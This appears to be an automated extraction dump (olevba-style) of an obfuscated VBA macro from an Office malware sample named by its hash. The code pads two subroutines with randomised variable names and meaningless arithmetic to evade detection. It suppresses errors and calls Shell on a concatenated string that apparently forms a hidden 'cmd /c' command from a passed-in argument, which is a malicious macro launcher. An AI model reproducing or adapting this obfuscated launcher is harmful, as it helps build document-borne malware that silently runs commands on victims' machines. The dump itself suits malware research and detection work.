Filename     : ./macros/4eea71c49b8b8b86708e58cc46e2c7b17fc213af0100f8b01caf13742e0e27a6
OLE stream   : Macros/VBA/zktipdEVHRO
VBA filename : zktipdEVHRO.bas
----------------------------------------
Attribute VB_Name = "zktipdEVHRO"
Sub DXIqCi(UfuRJp)
nPdOh = DrVPAV
XJKCii = buiic
wHzFS = pSqoss + Sgn(67425 - ZLCtqh - KLVsjb + Fix(53682)) - 89176 - CDbl(86699)
ulNjvr = 30034
RjcjUS = zBoQr
svlowi = jHNYz
zGVwd = nwYAG + Sgn(56424 - CikZni - sBqbv + Fix(98465)) - 25216 - CDbl(4427)
JTDiN = 40231
End Sub
Sub sOBlwwww(ptZbSLNChF As String)
On Error Resume Next
dFKwD = UuiLFb
zhZuvO = QtAiGk
OhDuci = GUdhwz + Sgn(65015 - zktlXO - tJnzZl + Fix(68291)) - 9129 - CDbl(61308)
SKFNbQ = 54995
wsNwMz = NVwQk
NUnnt = dIuXP
sfochV = RrYWO + Sgn(94570 - pjLQmo - UFpSZh + Fix(17921)) - 97578 - CDbl(71141)
VwzUS = 51672
[Shell] nbzTdowZqwSu + Chr(vbKeyC) + ptZbSLNChF + dkbCYZwKInKSGU + PwcXI, RdTLhL + 0 + RdTLhL
dLqbqQ = sikrEo
kWwwsc = ionBWU
JsUulV = ZkbhJ + Sgn(13876 - ZCSOS - QtBjij + Fix(411)) - 96859 - CDbl(44226)
ZUwuj = 80933
wSSbL = VOjUIF
UnDahQ = oQFVBC
BMMNhj = WvASEG + Sgn(60973 - vLrtl - mQVMTw + Fix(54595)) - 62362 - CDbl(25122)
ZIFTBW = 14696
End Sub
